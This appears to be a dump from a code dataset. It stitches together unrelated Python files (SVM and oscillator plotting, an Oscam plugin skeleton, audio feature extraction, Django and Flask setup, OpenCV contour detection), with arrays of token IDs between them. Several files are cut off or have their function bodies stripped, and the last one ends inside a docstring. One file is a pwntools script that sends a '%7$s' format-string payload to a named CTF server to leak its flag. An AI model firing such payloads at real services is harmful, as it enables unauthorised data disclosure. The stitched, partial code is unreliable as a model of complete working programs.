M = 2 / np.sqrt(np.sum(w ** 2))
Margin.append(M)
lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
temp_df = df[df['iteration'] == i]
temp_ar = temp_df.to_numpy()
comp_list.append(temp_ar)
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
loc="upper right")
plt.show()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
41972,
319,
2892,
2365,
220,
604,
1248,
25,
2231,
25,
2713,
33448,
13,
201,
198,
201,
198,
31,
9800,
25,
42768,
10989,
201,
198,
37811,
201,
198,... | 2.177979 | 5,967 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
2556,
2808,
678,
25,
2999,
25,
2999,
13130,
198,
198,
31,
9800,
25,
716,
5282,
107... | 2.309244 | 2,380 |
#!/usr/bin/env python
from pwn import *
# Format-string exploit: leak the string at stack argument POS via "%<POS>$s".
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7  # stack offset of the flag pointer -- presumably found by probing; confirm per target

s = remote(SERVER, PORT)
# The remote printf treats our input as a format string; "%7$s" dereferences
# the 7th vararg slot and prints the string it points to.
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))  # read up to the closing '}' of the flag
s.close()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
6738,
279,
675,
1330,
1635,
198,
198,
35009,
5959,
796,
366,
27238,
446,
13,
301,
83,
13,
81,
21283,
13,
660,
31522,
3713,
13,
377,
271,
48614,
13,
457,
1,
198,
15490,
796,
1802,
6... | 2.138298 | 94 |
# -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class OscamConfig:
    """Read the config files of a running Oscam installation.

    Currently only oscam.conf is parsed, to determine emmlogdir and the
    web-interface credentials.
    Also provides a method for reading the stored unique EMMs.

    NOTE(review): only the class skeleton is visible in this excerpt; the
    method bodies have been stripped.
    """
    # Status codes for the EMM-reading routine.
    EMM_OK = 1
    EMM_NOT_FOUND = 2
    EMM_VAR_LOG = 3
    EMM_NOCHANGE = 4
    #
    # Read the file containing the stored unique EMMs and return all stored
    # EMMs together with the date each last occurred. Obfuscate serial and
    # data for display on the TV.
    #
    #
    # Blank out emmlogdir directive in oscam.conf.
    #
class OscamWebif:
    """Methods to fetch information via Oscam web interface:
    - do we serve a supported card (V13, V14, Teleclub)?
    - what's the label of that card
    - get expire dates of entitlements
    - write an EMM

    NOTE(review): only the method documentation survives in this excerpt;
    the method bodies have been stripped.
    """
    #
    # GET request for web interface url.
    #
    # @param url string - url
    # @return string - contents of url
    #
    #
    # Read status page from Oscam JSON API
    # @return string - json text with status information
    #
    #
    # @param date string - input date string
    # @return string - formatted date string
    #
    #
    # Use Oscam JSON API to find out, if we have a local V13/V14 or
    # Teleclub card running. We return reader and CAID of that card.
    #
    # @return None|dict
    #
    #
    # Write EMM via web interface form.
    #
    # @param reader string - label of affected reader
    # @param caid string - caid of affected reader
    # @param emm string - emm to write to card
    # @param callback function - where to return to after writing
    #
    #
    # Read payload from one line of live log data.
    #
    # @return string|None - payload if pattern matches.
    #
    #
    # Read last payload from 10 seconds live log.
    # Call callback function after read out.
    #
    #
    # Read payload from live log.
    # Switch to debug level 4, set a timer, finish read out in timer callback.
    #
    # @param callback function - where to return after finishing timer callback.
    #
    #
    # Read tier ID's
    #
    # @param reader string - label of reader
    #
class CardStatus:
    """Class that holds gathered information from running Oscam instance.
    Is independent of enigma2 session, so testable without running enigma2.
    Is inherited from class OscamStatus.

    NOTE(review): only the method documentation survives in this excerpt;
    the method bodies have been stripped.
    """
    #
    # Look in oscam.version from temp file for ConfigDir parameter
    # and supported features.
    #
    # @param tempdir string - directory where oscam.version lives.
    # set self.oscamConfdir string - path to Oscam configuration directory
    # set self.oscamWebifSupport bool - is webif support compiled into Oscam
    # set self.oscamLivelogSupport - is live log support compiled into Oscam
    #
    #
    # Find Oscam temp dir from running Oscam process.
    # Check if process was started with param -t or --temp-dir
    #
    # @return string - temp dir where oscam.version lives.
    #
    #
    # Find out where oscam.conf lives.
    # First try to read out /tmp/.oscam/oscam.version
    # If that does not exist, try to find it from running Oscam
    #
    #
    # Get an OscamWebif object for communication via Web interface.
    #
    #
    # Read tier IDs and expire date from Oscam web interface.
    #
    # set self.expires - expire date from webif
    # set self.tiers - tiers list from webif
    # set self.localhostAccess - can localhost access webif
    # set self.webif - @class OscamWebif
    # set self.status - reader and caid for Sky from webif
    #
    #
    # Read unique EMM's from Oscam config dir
    #
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
2779,
2414,
198,
11748,
17056,
46677,
198,
11748,
2393,
15414,
198,
11748,
33918,
198,
11748,
28686,
198,
11748,
302,
198,
11748,
7007,
198,
198,
6738,
551,
13495,
... | 2.741573 | 1,513 |
# -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
# Module-level extension singletons; presumably bound to the Flask app later
# via init_app() in an application factory -- not visible in this excerpt.
db = SQLAlchemy()
login_manager = LoginManager()
def apply_themes(app):
"""
Add support for themes.
If DEFAULT_THEME is set then all calls to
url_for('static', filename='')
will modfify the url to include the theme name
The theme parameter can be set directly in url_for as well:
ex. url_for('static', filename='', theme='')
If the file cannot be found in the /static/<theme>/ location then
the url will not be modified and the file is expected to be
in the default /static/ location
"""
@app.context_processor
| [
2,
532,
9,
12,
21004,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
34156,
25,
17168,
198,
15269,
357,
66,
8,
13130,
532,
1944,
2034,
50,
2308,
13,
385,
198,
37811,
198,
198,
6738,
42903,
1330,
46947,
11,
19016,
62,
1640,
1... | 3.089965 | 289 |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
24893,
1087,
318,
10607,
284,
1104,
262,
1280,
2723,
2055,
416,
1642,
5525,
241,
251,
165,
110,
116,
162,
247,
118,
12859,
239,
47,
7252,
50,
33176,
111,
2... | 3.576305 | 498 |
# coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
    # Test parameters generated by the master
    row = 10000
    col = 10000
    iteration = 10
    param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
    params = [{'key': 'client-a'},
              {'key': 'client-b'},
              {'key': 'client-c'},
              {'key': 'client-d'},
              {'key': 'client-e'},
              {'key': 'client-f'},
              {'key': 'client-g'},
              {'key': 'client-h'},
              {'key': 'client-i'},
              {'key': 'client-j'}]

    # Per-iteration measurements saved under statistics/ for this test id.
    keys = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Key' + '.npy', allow_pickle=True)
    times = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Time' + '.npy')
    comps = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Comp' + '.npy')
    stops = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Stop' + '.npy')
    ideals = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Ideal' + '.npy')

    color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
    marker = ['o', '^', 's', 'D', 'x', '*', '+']
    slave = [e['key'] for e in params]

    for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals):  # one pass per iteration
        group = {}
        for i, s in enumerate(slave):
            group[s] = {}
            group[s]['time'] = time[i]
            group[s]['comp'] = comp[i]
            # A slave is "valid" when it appears in this iteration's key set.
            if key.__contains__(s):
                group[s]['valid'] = True
            else:
                group[s]['valid'] = False
        print('--- iteration ---')
        print(group)

    # # Total computation count per node
    # fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
    # plt.title('Computation vs Latency')
    # plt.xlabel('latency (s)')
    # plt.ylabel('computation/$m$ (ratio)')
    #
    # plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
    # plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
    # plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
    #
    # for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
    #     plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
    #
    # plt.legend(loc='upper left')
    # plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
    # plt.show()
| [
2,
19617,
28,
40477,
12,
23,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1303,
13328,
242,
... | 1.977778 | 1,305 |
import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def derivative(x, f):
    """Numerically differentiate f with respect to x (first-order FDM).

    Args:
        x: sample positions in seconds (1d array, uniform spacing assumed)
        f: function values at each x

    Returns:
        der: array the same length as f; element i holds (f[i] - f[i-1]) / dx,
        with the first element fixed to 0, where dx is the spacing expressed
        in milliseconds.
    """
    t_ms = 1000 * x  # from seconds to milliseconds
    step = t_ms[1] - t_ms[0]
    # Backward differences; pad a stable 0 in front so the output keeps len(f).
    return np.concatenate(([0.0], np.diff(f))) / step
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
    """
    Extract all 4 prosodic features

    Args:
        audio_filename: file name for the audio to be used
        nb_frames: number of output frames to resample the feature track to
        time_step: analysis hop in seconds (default 20 ms)

    Returns:
        pros_feature: (nb_frames, 4) array of energy, energy_der, pitch, pitch_der
    """
    # Read audio from file
    sound = AudioSegment.from_file(audio_filename, format="wav")

    # Alternative prosodic features
    # NOTE(review): compute_prosody is defined elsewhere in this module.
    pitch, energy = compute_prosody(audio_filename, time_step)

    duration = len(sound) / 1000  # pydub reports length in milliseconds
    t = np.arange(0, duration, time_step)

    # Numerical derivatives of both tracks (see derivative() above).
    energy_der = derivative(t, energy)
    pitch_der = derivative(t, pitch)

    # Stack them all together
    pros_feature = np.stack((energy, energy_der, pitch, pitch_der))

    # And reshape
    pros_feature = np.transpose(pros_feature)  # -> (num_steps, 4)

    # Resample along time so every clip yields exactly nb_frames rows.
    return sig.resample(pros_feature, nb_frames)
def crosstalk_vad(
    speaker1_path,
    speaker2_path,
    frame_count,
    tha=30,
    thb=5,
    savgol_win=301,
    savgol_poly_order=1,
):
    """
    Channel-exclusive voice activity detection for a two-speaker recording.

    tha: absolute dB level for when to consider there to be speech activity in a channel
    thb: minimum difference between channels to consider it to be one speaker only
    savgol_win / savgol_poly_order: Savitzky-Golay smoothing of the raw masks

    Returns (s1x, s2x): 0/1 arrays of length frame_count, 1 where only that
    speaker is active.
    """
    fs, x1 = wav.read(speaker1_path)
    _, x2 = wav.read(speaker2_path)
    # scipy yields integer PCM; convert for the dB math below.
    x1 = x1.astype("float")
    x2 = x2.astype("float")
    # calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
    e1 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    e2 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    # boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
    s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
    s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
    # Smooth the boolean masks to bridge short gaps before resampling.
    smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
    smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
    # Resample to frame_count samples (presumably the video frame count)
    # and re-binarize with a 0.1 threshold.
    s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
    s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
    s1x[s1x >= 0.1] = 1
    s2x[s2x >= 0.1] = 1
    s1x[s1x < 0.1] = 0
    s2x[s2x < 0.1] = 0
    return s1x, s2x
| [
11748,
4423,
346,
198,
11748,
20218,
7753,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
11748,
9195,
4951,
64,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1582,
741,
14775,
355,
9114,
198,
11748,
629,
541,
88,
13,
952,
13,
45137,
... | 2.368852 | 1,342 |
''' Functions with output
def my_function(something):
    #Do this with something
    #Then do this
    #finally do this

def my_function():
    return 3 * 2 # result
'''


def format_name(f_name, l_name):
    """Title-case both names and return them joined with a space."""
    formated_f_name = f_name.title()
    formated_l_name = l_name.title()
    return f"{formated_f_name} {formated_l_name}"


# BUG FIX: format_name existed only in commented-out drafts, so this call
# raised NameError. The working version above *returns* the formatted string
# (printing inside the function could not satisfy print(format_name(...))).
print(format_name("RicHARD", "MATSON"))  # Richard Matson

output = len("Richard")  # built-ins like len() also return values
| [
7061,
6,
40480,
351,
5072,
198,
4299,
616,
62,
8818,
7,
18927,
2599,
198,
220,
220,
220,
1303,
5211,
428,
351,
1223,
198,
220,
220,
220,
1303,
6423,
466,
428,
198,
220,
220,
220,
1303,
69,
3289,
466,
428,
198,
198,
4299,
616,
62,
... | 2.322086 | 326 |
import csv
import os
from score_comparer import ScoreComparer
| [
11748,
269,
21370,
198,
11748,
28686,
198,
6738,
4776,
62,
5589,
11258,
1330,
15178,
7293,
11258,
198
] | 3.647059 | 17 |
import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
if __name__ == '__main__':
    # CLI entry point: parse input/output paths and hand them to rough_midi.
    parser = argparse.ArgumentParser(
        description='analyze whole stems.')
    parser.add_argument(
        'inpath', type=str, help='path to the stem of interest')
    parser.add_argument(
        # BUG FIX: help text was copy-pasted from inpath.
        'outpath', type=str, help='path to write the analysis output')
    # NOTE(review): rough_midi is defined elsewhere in this module.
    rough_midi(parser.parse_args())
| [
11748,
410,
696,
198,
11748,
9195,
4951,
64,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2495,
62,
13602,
72,
198,
11748,
44147,
198,
11748,
28686,
198,
11748,
1822,
29572,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834... | 2.650602 | 166 |
import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Admin branding; the title can be overridden via the environment.
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')

# Route /admin/ to the Django admin and everything else to the hub app.
# NOTE(review): patterns() is the old pre-1.8-style URL API (removed in
# Django 1.10) -- valid only for the Django version this project pins.
urlpatterns = patterns(
    '',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^', include('hub.urls')),
)

# Serve static files in development (per Django docs, a no-op unless DEBUG).
urlpatterns += staticfiles_urlpatterns()
| [
11748,
28686,
198,
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
7572,
11,
2291,
11,
19016,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
12708,
16624,
13,
6371,
82,
1330,
9037,
... | 2.633987 | 153 |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Structuring element for dilation: thickens Canny edges so contours close.
KERNEL = np.ones((5, 5), np.uint8)

# Import the model (loaded here; not yet used in the code below).
model = load_model('big_model')

# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))

# Grayscale -> blur -> Canny -> dilate: standard edge-extraction pipeline.
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations=1)

contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)

# Back to 3 channels so the contour points can be drawn in color.
edges = cv2.cvtColor(edges, cv2.COLOR_GRAY2RGB)
for points in contours[0]:  # points of the first contour only
    coor_list = points[0].tolist()
    edges = cv2.circle(edges, (coor_list[0], coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)

cv2.imshow('edges', edges)
# BUG FIX: without waitKey() the HighGUI event loop never runs, so the window
# was destroyed before it could render. Block until a key is pressed.
cv2.waitKey(0)
cv2.destroyAllWindows()

# Helpful links to continue this:
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| [
198,
6738,
28686,
13,
6978,
1330,
4292,
7220,
198,
198,
11748,
269,
85,
17,
198,
6738,
41927,
292,
13,
27530,
1330,
3440,
62,
19849,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
6... | 2.416955 | 578 |
"""Support file to handle configuration files."""
import json
import os
class Config():
    """Serialize configuration items to a JSON file.

    NOTE(review): ``self.__config`` (dict) and ``self.filename`` (path) are
    expected to be set during construction; ``__init__`` is not visible here.
    """

    def get(self, key=None, default=None):
        """Return one config item, or all public items when *key* is None.

        Keys starting with '__' are treated as hidden: they are excluded from
        the bulk listing but remain reachable by explicit key.
        """
        if key is None:
            # return all public config items (filter out the hidden items)
            return {k: self.__config[k] for k in self.__config if not k.startswith('__')}
        return self.__config.get(key, default)

    def set(self, key, value):
        """Set a config item and persist the store to disk."""
        self.__config[key] = value
        self.__save()

    def remove(self, key):
        """Remove a config item and persist the store to disk.

        Raises:
            KeyError: if *key* is not present.
        """
        # BUG FIX: docstring previously said "Set a config item."
        del self.__config[key]
        self.__save()

    def __save(self):
        """Write the full config dict (hidden items included) as JSON."""
        with open(self.filename, 'w') as file:
            file.write(json.dumps(self.__config))
| [
37811,
15514,
2393,
284,
5412,
8398,
3696,
526,
15931,
198,
11748,
33918,
198,
11748,
28686,
628,
198,
4871,
17056,
33529,
198,
220,
220,
220,
37227,
9487,
329,
11389,
2890,
8398,
3709,
526,
15931,
628,
220,
220,
220,
825,
651,
7,
944,
... | 2.456647 | 346 |
from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
@jwt.invalid_token_loader
@jwt.unauthorized_loader
| [
6738,
42903,
62,
73,
46569,
62,
2302,
1631,
1330,
2251,
62,
15526,
62,
30001,
11,
41,
39386,
13511,
198,
6738,
42903,
1330,
33918,
1958,
198,
6738,
3586,
1330,
598,
198,
6738,
3586,
13,
27530,
13,
12982,
18254,
1330,
11787,
18254,
198,
... | 3 | 146 |
# -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
12972,
9288,
198,
198,
6738,
37370,
1082,
13,
1069,
11755,
1330,
8798,
16922,
198,
6738,
37370,
1082,
13,
27530,
13,
33990,
1330,
25700,
198,
6738,
37370,
1082,
13,... | 3.481013 | 79 |
""" PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
